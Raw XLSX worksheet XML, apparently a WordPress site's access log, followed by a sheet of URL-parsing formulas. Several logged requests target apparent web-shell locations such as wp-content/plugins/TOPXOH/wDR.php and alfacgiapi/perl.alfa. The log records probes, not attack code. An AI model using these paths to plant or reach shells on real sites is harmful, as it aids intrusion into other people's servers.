        <f t="shared" si="107"/>
        <v>kannada-essay/kannada-essay-namma-kere-nammura-kere-%E0%B2%95%E0%B2%A8%E0%B3%8D%E0%B2%A8%E0%B2%A1-%E0%B2%AA%E0%B3%8D%E0%B2%B0%E0%B2%AC%E0%B2%82%E0%B2%A7-%E0%B2%A8%E0%B2%AE%E0%B3%8D%E0%B2%AE-%E0%B2%95%E0%B3%86/</v>
      </c>
      <c r="E6903" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="6904" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6904" s="1">
        <v>44998.124664351853</v>
      </c>
      <c r="B6904" t="s">
        <v>2231</v>
      </c>
      <c r="C6904" t="s">
        <v>2229</v>
      </c>
      <c r="D6904" t="str">
        <f t="shared" si="107"/>
        <v>kannada-essay/kannada-essay-namma-kere-nammura-kere-%E0%B2%95%E0%B2%A8%E0%B3%8D%E0%B2%A8%E0%B2%A1-%E0%B2%AA%E0%B3%8D%E0%B2%B0%E0%B2%AC%E0%B2%82%E0%B2%A7-%E0%B2%A8%E0%B2%AE%E0%B3%8D%E0%B2%AE-%E0%B2%95%E0%B3%86/</v>
      </c>
      <c r="E6904" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="6905" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6905" s="1">
        <v>44998.114629629628</v>
      </c>
      <c r="B6905" t="s">
        <v>2232</v>
      </c>
      <c r="C6905" t="s">
        <v>2229</v>
      </c>
      <c r="D6905" t="str">
        <f t="shared" si="107"/>
        <v>kannada-essay/kannada-essay-namma-kere-nammura-kere-%E0%B2%95%E0%B2%A8%E0%B3%8D%E0%B2%A8%E0%B2%A1-%E0%B2%AA%E0%B3%8D%E0%B2%B0%E0%B2%AC%E0%B2%82%E0%B2%A7-%E0%B2%A8%E0%B2%AE%E0%B3%8D%E0%B2%AE-%E0%B2%95%E0%B3%86/</v>
      </c>
      <c r="E6905" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="6906" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6906" s="1">
        <v>44996.955752314818</v>
      </c>
      <c r="B6906" t="s">
        <v>1295</v>
      </c>
      <c r="C6906" t="s">
        <v>2031</v>
      </c>
      <c r="D6906" t="str">
        <f t="shared" si="107"/>
        <v>wp-content/updates.php</v>
      </c>
      <c r="E6906" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6907" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6907" s="1">
        <v>44996.955543981479</v>
      </c>
      <c r="B6907" t="s">
        <v>1295</v>
      </c>
      <c r="C6907" t="s">
        <v>2233</v>
      </c>
      <c r="D6907" t="str">
        <f t="shared" si="107"/>
        <v>wp-content/plugins/TOPXOH/wDR.php</v>
      </c>
      <c r="E6907" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6908" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6908" s="1">
        <v>44996.955254629633</v>
      </c>
      <c r="B6908" t="s">
        <v>1295</v>
      </c>
      <c r="C6908" t="s">
        <v>2234</v>
      </c>
      <c r="D6908" t="str">
        <f t="shared" si="107"/>
        <v>wp-content/plugins/w0rdpr3ssnew/wp-login.php</v>
      </c>
      <c r="E6908" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6909" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6909" s="1">
        <v>44996.954942129632</v>
      </c>
      <c r="B6909" t="s">
        <v>1295</v>
      </c>
      <c r="C6909" t="s">
        <v>2235</v>
      </c>
      <c r="D6909" t="str">
        <f t="shared" si="107"/>
        <v>wp-content/plugins/TOPXOH/OH.php</v>
      </c>
      <c r="E6909" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6910" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6910" s="1">
        <v>44996.936840277776</v>
      </c>
      <c r="B6910" t="s">
        <v>1295</v>
      </c>
      <c r="C6910" t="s">
        <v>1987</v>
      </c>
      <c r="D6910" t="str">
        <f t="shared" si="107"/>
        <v>wp-content/updates.php</v>
      </c>
      <c r="E6910" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6911" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6911" s="1">
        <v>44996.936759259261</v>
      </c>
      <c r="B6911" t="s">
        <v>1295</v>
      </c>
      <c r="C6911" t="s">
        <v>1380</v>
      </c>
      <c r="D6911" t="str">
        <f t="shared" si="107"/>
        <v>wp-content/plugins/TOPXOH/wDR.php</v>
      </c>
      <c r="E6911" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6912" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6912" s="1">
        <v>44996.936689814815</v>
      </c>
      <c r="B6912" t="s">
        <v>1295</v>
      </c>
      <c r="C6912" t="s">
        <v>2205</v>
      </c>
      <c r="D6912" t="str">
        <f t="shared" si="107"/>
        <v>wp-content/plugins/w0rdpr3ssnew/wp-login.php</v>
      </c>
      <c r="E6912" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6913" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6913" s="1">
        <v>44996.936608796299</v>
      </c>
      <c r="B6913" t="s">
        <v>1295</v>
      </c>
      <c r="C6913" t="s">
        <v>2206</v>
      </c>
      <c r="D6913" t="str">
        <f t="shared" si="107"/>
        <v>wp-content/plugins/TOPXOH/OH.php</v>
      </c>
      <c r="E6913" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6914" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6914" s="1">
        <v>44996.35738425926</v>
      </c>
      <c r="B6914" t="s">
        <v>2236</v>
      </c>
      <c r="C6914" t="s">
        <v>43</v>
      </c>
      <c r="D6914" t="str">
        <f t="shared" ref="D6914:D6928" si="108">MID(C6914,FIND("#", SUBSTITUTE(C6914, "/", "#", 3))+1,LEN(C6914)-FIND("#", SUBSTITUTE(C6914, "/", "#", 3))+1)</f>
        <v>wp-plain.php</v>
      </c>
      <c r="E6914" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6915" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6915" s="1">
        <v>44996.357372685183</v>
      </c>
      <c r="B6915" t="s">
        <v>2236</v>
      </c>
      <c r="C6915" t="s">
        <v>45</v>
      </c>
      <c r="D6915" t="str">
        <f t="shared" si="108"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E6915" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6916" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6916" s="1">
        <v>44996.357361111113</v>
      </c>
      <c r="B6916" t="s">
        <v>2236</v>
      </c>
      <c r="C6916" t="s">
        <v>46</v>
      </c>
      <c r="D6916" t="str">
        <f t="shared" si="108"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E6916" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6917" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6917" s="1">
        <v>44996.357361111113</v>
      </c>
      <c r="B6917" t="s">
        <v>2236</v>
      </c>
      <c r="C6917" t="s">
        <v>43</v>
      </c>
      <c r="D6917" t="str">
        <f t="shared" si="108"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E6917" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6918" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6918" s="1">
        <v>44995.94599537037</v>
      </c>
      <c r="B6918" t="s">
        <v>2237</v>
      </c>
      <c r="C6918" t="s">
        <v>2229</v>
      </c>
      <c r="D6918" t="str">
        <f t="shared" si="108"/>
        <v>kannada-essay/kannada-essay-namma-kere-nammura-kere-%E0%B2%95%E0%B2%A8%E0%B3%8D%E0%B2%A8%E0%B2%A1-%E0%B2%AA%E0%B3%8D%E0%B2%B0%E0%B2%AC%E0%B2%82%E0%B2%A7-%E0%B2%A8%E0%B2%AE%E0%B3%8D%E0%B2%AE-%E0%B2%95%E0%B3%86/</v>
      </c>
      <c r="E6918" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6919" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6919" s="1">
        <v>44995.543391203704</v>
      </c>
      <c r="B6919" t="s">
        <v>2238</v>
      </c>
      <c r="C6919" t="s">
        <v>5</v>
      </c>
      <c r="D6919" t="str">
        <f t="shared" si="108"/>
        <v/>
      </c>
      <c r="E6919" t="s">
        <v>2239</v>
      </c>
    </row>
    <row r="6920" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6920" s="1">
        <v>44995.389513888891</v>
      </c>
      <c r="B6920" t="s">
        <v>2240</v>
      </c>
      <c r="C6920" t="s">
        <v>5</v>
      </c>
      <c r="D6920" t="str">
        <f t="shared" si="108"/>
        <v/>
      </c>
      <c r="E6920" t="s">
        <v>482</v>
      </c>
    </row>
    <row r="6921" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6921" s="1">
        <v>44995.322615740741</v>
      </c>
      <c r="B6921" t="s">
        <v>2241</v>
      </c>
      <c r="C6921" t="s">
        <v>5</v>
      </c>
      <c r="D6921" t="str">
        <f t="shared" si="108"/>
        <v/>
      </c>
      <c r="E6921" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6922" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6922" s="1">
        <v>44995.322546296295</v>
      </c>
      <c r="B6922" t="s">
        <v>2241</v>
      </c>
      <c r="C6922" t="s">
        <v>5</v>
      </c>
      <c r="D6922" t="str">
        <f t="shared" si="108"/>
        <v/>
      </c>
      <c r="E6922" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6923" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6923" s="1">
        <v>44993.360347222224</v>
      </c>
      <c r="B6923" t="s">
        <v>2220</v>
      </c>
      <c r="C6923" t="s">
        <v>2242</v>
      </c>
      <c r="D6923" t="str">
        <f t="shared" si="108"/>
        <v>chtmlfuns.php</v>
      </c>
      <c r="E6923" t="s">
        <v>2222</v>
      </c>
    </row>
    <row r="6924" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6924" s="1">
        <v>44992.133298611108</v>
      </c>
      <c r="B6924" t="s">
        <v>2224</v>
      </c>
      <c r="C6924" t="s">
        <v>2243</v>
      </c>
      <c r="D6924" t="str">
        <f t="shared" si="108"/>
        <v>actress-anchors-models/anveshi-jain-gandi-baat-2-actress/</v>
      </c>
      <c r="E6924" t="s">
        <v>282</v>
      </c>
    </row>
    <row r="6925" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6925" s="1">
        <v>44992.133275462962</v>
      </c>
      <c r="B6925" t="s">
        <v>2224</v>
      </c>
      <c r="C6925" t="s">
        <v>2244</v>
      </c>
      <c r="D6925" t="str">
        <f t="shared" si="108"/>
        <v>wp-content/uploads/2020/06/cropped-Screenshot_20200606-143501-01-2-237x300.jpeg?v=1600437802</v>
      </c>
      <c r="E6925" t="s">
        <v>282</v>
      </c>
    </row>
    <row r="6926" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6926" s="1">
        <v>44992.133263888885</v>
      </c>
      <c r="B6926" t="s">
        <v>2224</v>
      </c>
      <c r="C6926" t="s">
        <v>2245</v>
      </c>
      <c r="D6926" t="str">
        <f t="shared" si="108"/>
        <v>wp-content/uploads/2020/08/images-1.jpeg?v=1600437765</v>
      </c>
      <c r="E6926" t="s">
        <v>282</v>
      </c>
    </row>
    <row r="6927" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6927" s="1">
        <v>44992.132175925923</v>
      </c>
      <c r="B6927" t="s">
        <v>2224</v>
      </c>
      <c r="C6927" t="s">
        <v>2246</v>
      </c>
      <c r="D6927" t="str">
        <f t="shared" si="108"/>
        <v>page/7/</v>
      </c>
      <c r="E6927" t="s">
        <v>282</v>
      </c>
    </row>
    <row r="6928" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6928" s="1">
        <v>44992.08730324074</v>
      </c>
      <c r="B6928" t="s">
        <v>2224</v>
      </c>
      <c r="C6928" t="s">
        <v>5</v>
      </c>
      <c r="D6928" t="str">
        <f t="shared" si="108"/>
        <v/>
      </c>
      <c r="E6928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928"/>
  <sheetViews>
    <sheetView topLeftCell="B1" workbookViewId="0">
      <selection activeCell="F1" sqref="F1:F1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="80.7265625" customWidth="1"/>
    <col min="2" max="2" width="35.08984375" customWidth="1"/>
    <col min="3" max="3" width="15.453125" customWidth="1"/>
    <col min="4" max="4" width="18.90625" customWidth="1"/>
    <col min="5" max="5" width="22.90625" customWidth="1"/>
    <col min="6" max="6" width="37.54296875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>2247</v>
      </c>
      <c r="B1" t="s">
        <v>3295</v>
      </c>
      <c r="C1" t="s">
        <v>3296</v>
      </c>
      <c r="D1" t="s">
        <v>3297</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2" t="s">
        <v>2248</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3" t="s">
        <v>2248</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A4" t="s">
        <v>2248</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A5" t="s">
        <v>2249</v>
      </c>
      <c r="B5" t="str">
        <f>IF(FIND("name=",$A5,1)&gt;0,MID($A5,FIND("name=",$A5,1)+5,LEN($A5)-FIND("name=",$A5,1)),"")</f>
        <v>Veronica%20Perasso</v>
      </c>
      <c r="C5" t="e">
        <f>IF(FIND("tag/",$A5,1)&gt;0,MID($A5,FIND("tag/",$A5,1)+4,LEN($A5)-FIND("tag/",$A5,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D5" t="e">
        <f>IF(FIND("category",$A5,1)&gt;0,MID($A5,FIND("category",$A5,1)+9,LEN($A5)-FIND("category",$A5,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E5" t="str" cm="1">
        <f t="array" ref="E5">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A5)), MID($A5, FIND("name=",$A5) + 5, LEN($A5) - FIND("name=",$A5)),
    ISNUMBER(FIND("tag/",$A5)), MID($A5, FIND("tag/",$A5) + 4, LEN($A5) - FIND("tag/",$A5)),
    ISNUMBER(FIND("category",$A5)), MID($A5, FIND("category",$A5) + 9, LEN($A5) - FIND("category",$A5)))</f>
        <v>Veronica%20Perasso</v>
      </c>
      <c r="F5" t="s">
        <v>3298</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A6" t="s">
        <v>2250</v>
      </c>
      <c r="B6" t="e">
        <f>IF(FIND("name=",A6,1)&gt;0,MID(A6,FIND("name=",A6,1)+5,LEN(A6)-FIND("name=",A6,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C6" t="e">
        <f t="shared" ref="C6:C69" si="0">IF(FIND("tag/",$A6,1)&gt;0,MID($A6,FIND("tag/",$A6,1)+4,LEN($A6)-FIND("tag/",$A6,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D6" t="e">
        <f t="shared" ref="D6:D9" si="1">IF(FIND("category",$A6,1)&gt;0,MID($A6,FIND("category",$A6,1)+9,LEN($A6)-FIND("category",$A6,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E6" t="e" cm="1">
        <f t="array" ref="E6">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A6)), MID($A6, FIND("name=",$A6) + 5, LEN($A6) - FIND("name=",$A6)),
    ISNUMBER(FIND("tag/",$A6)), MID($A6, FIND("tag/",$A6) + 4, LEN($A6) - FIND("tag/",$A6)),
    ISNUMBER(FIND("category",$A6)), MID($A6, FIND("category",$A6) + 9, LEN($A6) - FIND("category",$A6)))</f>
        <v>#N/A</v>
      </c>
      <c r="F6" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A7" t="s">
        <v>2250</v>
      </c>
      <c r="B7" t="e">
        <f t="shared" ref="B7:B69" si="2">IF(FIND("name=",A7,1)&gt;0,MID(A7,FIND("name=",A7,1)+5,LEN(A7)-FIND("name=",A7,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C7" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D7" t="e">
        <f t="shared" si="1"/>
        <v>#VALUE!</v>
      </c>
      <c r="E7" t="e" cm="1">
        <f t="array" ref="E7">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A7)), MID($A7, FIND("name=",$A7) + 5, LEN($A7) - FIND("name=",$A7)),
    ISNUMBER(FIND("tag/",$A7)), MID($A7, FIND("tag/",$A7) + 4, LEN($A7) - FIND("tag/",$A7)),
    ISNUMBER(FIND("category",$A7)), MID($A7, FIND("category",$A7) + 9, LEN($A7) - FIND("category",$A7)))</f>
        <v>#N/A</v>
      </c>
      <c r="F7" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A8" t="s">
        <v>2250</v>
      </c>
      <c r="B8" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C8" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D8" t="e">
        <f t="shared" si="1"/>
        <v>#VALUE!</v>
      </c>
      <c r="E8" t="e" cm="1">
        <f t="array" ref="E8">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A8)), MID($A8, FIND("name=",$A8) + 5, LEN($A8) - FIND("name=",$A8)),
    ISNUMBER(FIND("tag/",$A8)), MID($A8, FIND("tag/",$A8) + 4, LEN($A8) - FIND("tag/",$A8)),
    ISNUMBER(FIND("category",$A8)), MID($A8, FIND("category",$A8) + 9, LEN($A8) - FIND("category",$A8)))</f>
        <v>#N/A</v>
      </c>
      <c r="F8" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A9" t="s">
        <v>2251</v>
      </c>
      <c r="B9" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C9" t="str">
        <f t="shared" si="0"/>
        <v>sofia-ansari/</v>
      </c>
      <c r="D9" t="e">
        <f t="shared" si="1"/>
        <v>#VALUE!</v>
      </c>
      <c r="E9" t="str" cm="1">
        <f t="array" ref="E9">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A9)), MID($A9, FIND("name=",$A9) + 5, LEN($A9) - FIND("name=",$A9)),
    ISNUMBER(FIND("tag/",$A9)), MID($A9, FIND("tag/",$A9) + 4, LEN($A9) - FIND("tag/",$A9)),
    ISNUMBER(FIND("category",$A9)), MID($A9, FIND("category",$A9) + 9, LEN($A9) - FIND("category",$A9)))</f>
        <v>sofia-ansari/</v>
      </c>
      <c r="F9" t="s">
        <v>3299</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A10" t="s">
        <v>2252</v>
      </c>
      <c r="B10" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C10" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D10" t="str">
        <f>IF(FIND("category",$A10,1)&gt;0,MID($A10,FIND("category",$A10,1)+9,LEN($A10)-FIND("category",$A10,1)),"")</f>
        <v>indian-serial-actress/</v>
      </c>
      <c r="E10" t="str" cm="1">
        <f t="array" ref="E10">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A10)), MID($A10, FIND("name=",$A10) + 5, LEN($A10) - FIND("name=",$A10)),
    ISNUMBER(FIND("tag/",$A10)), MID($A10, FIND("tag/",$A10) + 4, LEN($A10) - FIND("tag/",$A10)),
    ISNUMBER(FIND("category",$A10)), MID($A10, FIND("category",$A10) + 9, LEN($A10) - FIND("category",$A10)))</f>
        <v>indian-serial-actress/</v>
      </c>
      <c r="F10" t="s">
        <v>3300</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A11" t="s">
        <v>2253</v>
      </c>
      <c r="B11" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C11" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D11" t="e">
        <f t="shared" ref="D11:D74" si="3">IF(FIND("category",$A11,1)&gt;0,MID($A11,FIND("category",$A11,1)+9,LEN($A11)-FIND("category",$A11,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E11" t="e" cm="1">
        <f t="array" ref="E11">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A11)), MID($A11, FIND("name=",$A11) + 5, LEN($A11) - FIND("name=",$A11)),
    ISNUMBER(FIND("tag/",$A11)), MID($A11, FIND("tag/",$A11) + 4, LEN($A11) - FIND("tag/",$A11)),
    ISNUMBER(FIND("category",$A11)), MID($A11, FIND("category",$A11) + 9, LEN($A11) - FIND("category",$A11)))</f>
        <v>#N/A</v>
      </c>
      <c r="F11" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A12" t="s">
        <v>2254</v>
      </c>
      <c r="B12" t="str">
        <f t="shared" si="2"/>
        <v>Dhivya%20Duraisamy&amp;date=2023-12-26</v>
      </c>
      <c r="C12" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D12" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E12" t="str" cm="1">
        <f t="array" ref="E12">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A12)), MID($A12, FIND("name=",$A12) + 5, LEN($A12) - FIND("name=",$A12)),
    ISNUMBER(FIND("tag/",$A12)), MID($A12, FIND("tag/",$A12) + 4, LEN($A12) - FIND("tag/",$A12)),
    ISNUMBER(FIND("category",$A12)), MID($A12, FIND("category",$A12) + 9, LEN($A12) - FIND("category",$A12)))</f>
        <v>Dhivya%20Duraisamy&amp;date=2023-12-26</v>
      </c>
      <c r="F12" t="s">
        <v>3301</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A13" t="s">
        <v>2255</v>
      </c>
      <c r="B13" t="str">
        <f t="shared" si="2"/>
        <v>Style%20With%20Plixxi</v>
      </c>
      <c r="C13" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D13" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E13" t="str" cm="1">
        <f t="array" ref="E13">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A13)), MID($A13, FIND("name=",$A13) + 5, LEN($A13) - FIND("name=",$A13)),
    ISNUMBER(FIND("tag/",$A13)), MID($A13, FIND("tag/",$A13) + 4, LEN($A13) - FIND("tag/",$A13)),
    ISNUMBER(FIND("category",$A13)), MID($A13, FIND("category",$A13) + 9, LEN($A13) - FIND("category",$A13)))</f>
        <v>Style%20With%20Plixxi</v>
      </c>
      <c r="F13" t="s">
        <v>3302</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A14" t="s">
        <v>2252</v>
      </c>
      <c r="B14" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C14" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D14" t="str">
        <f t="shared" si="3"/>
        <v>indian-serial-actress/</v>
      </c>
      <c r="E14" t="str" cm="1">
        <f t="array" ref="E14">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A14)), MID($A14, FIND("name=",$A14) + 5, LEN($A14) - FIND("name=",$A14)),
    ISNUMBER(FIND("tag/",$A14)), MID($A14, FIND("tag/",$A14) + 4, LEN($A14) - FIND("tag/",$A14)),
    ISNUMBER(FIND("category",$A14)), MID($A14, FIND("category",$A14) + 9, LEN($A14) - FIND("category",$A14)))</f>
        <v>indian-serial-actress/</v>
      </c>
      <c r="F14" t="s">
        <v>3300</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A15" t="s">
        <v>2256</v>
      </c>
      <c r="B15" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C15" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D15" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E15" t="e" cm="1">
        <f t="array" ref="E15">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A15)), MID($A15, FIND("name=",$A15) + 5, LEN($A15) - FIND("name=",$A15)),
    ISNUMBER(FIND("tag/",$A15)), MID($A15, FIND("tag/",$A15) + 4, LEN($A15) - FIND("tag/",$A15)),
    ISNUMBER(FIND("category",$A15)), MID($A15, FIND("category",$A15) + 9, LEN($A15) - FIND("category",$A15)))</f>
        <v>#N/A</v>
      </c>
      <c r="F15" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A16" t="s">
        <v>2253</v>
      </c>
      <c r="B16" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C16" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D16" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E16" t="e" cm="1">
        <f t="array" ref="E16">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A16)), MID($A16, FIND("name=",$A16) + 5, LEN($A16) - FIND("name=",$A16)),
    ISNUMBER(FIND("tag/",$A16)), MID($A16, FIND("tag/",$A16) + 4, LEN($A16) - FIND("tag/",$A16)),
    ISNUMBER(FIND("category",$A16)), MID($A16, FIND("category",$A16) + 9, LEN($A16) - FIND("category",$A16)))</f>
        <v>#N/A</v>
      </c>
      <c r="F16" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A17" t="s">
        <v>2257</v>
      </c>
      <c r="B17" t="str">
        <f t="shared" si="2"/>
        <v>Vaibhavi%20Joshi%20777&amp;date=2023-11-05</v>
      </c>
      <c r="C17" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D17" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E17" t="str" cm="1">
        <f t="array" ref="E17">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A17)), MID($A17, FIND("name=",$A17) + 5, LEN($A17) - FIND("name=",$A17)),
    ISNUMBER(FIND("tag/",$A17)), MID($A17, FIND("tag/",$A17) + 4, LEN($A17) - FIND("tag/",$A17)),
    ISNUMBER(FIND("category",$A17)), MID($A17, FIND("category",$A17) + 9, LEN($A17) - FIND("category",$A17)))</f>
        <v>Vaibhavi%20Joshi%20777&amp;date=2023-11-05</v>
      </c>
      <c r="F17" t="s">
        <v>3303</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A18" t="s">
        <v>2258</v>
      </c>
      <c r="B18" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C18" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D18" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E18" t="e" cm="1">
        <f t="array" ref="E18">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A18)), MID($A18, FIND("name=",$A18) + 5, LEN($A18) - FIND("name=",$A18)),
    ISNUMBER(FIND("tag/",$A18)), MID($A18, FIND("tag/",$A18) + 4, LEN($A18) - FIND("tag/",$A18)),
    ISNUMBER(FIND("category",$A18)), MID($A18, FIND("category",$A18) + 9, LEN($A18) - FIND("category",$A18)))</f>
        <v>#N/A</v>
      </c>
      <c r="F18" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A19" t="s">
        <v>2252</v>
      </c>
      <c r="B19" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C19" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D19" t="str">
        <f t="shared" si="3"/>
        <v>indian-serial-actress/</v>
      </c>
      <c r="E19" t="str" cm="1">
        <f t="array" ref="E19">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A19)), MID($A19, FIND("name=",$A19) + 5, LEN($A19) - FIND("name=",$A19)),
    ISNUMBER(FIND("tag/",$A19)), MID($A19, FIND("tag/",$A19) + 4, LEN($A19) - FIND("tag/",$A19)),
    ISNUMBER(FIND("category",$A19)), MID($A19, FIND("category",$A19) + 9, LEN($A19) - FIND("category",$A19)))</f>
        <v>indian-serial-actress/</v>
      </c>
      <c r="F19" t="s">
        <v>3300</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A20" t="s">
        <v>2256</v>
      </c>
      <c r="B20" t="e">
        <f t="shared" si="2"/>
        <v>#VALUE!</v>
      </c>
      <c r="C20" t="e">
        <f t="shared" si="0"/>
        <v>#VALUE!</v>
      </c>
      <c r="D20" t="e">
        <f t="shared" si="3"/>
        <v>#VALUE!</v>
      </c>
      <c r="E20" t="e" cm="1">
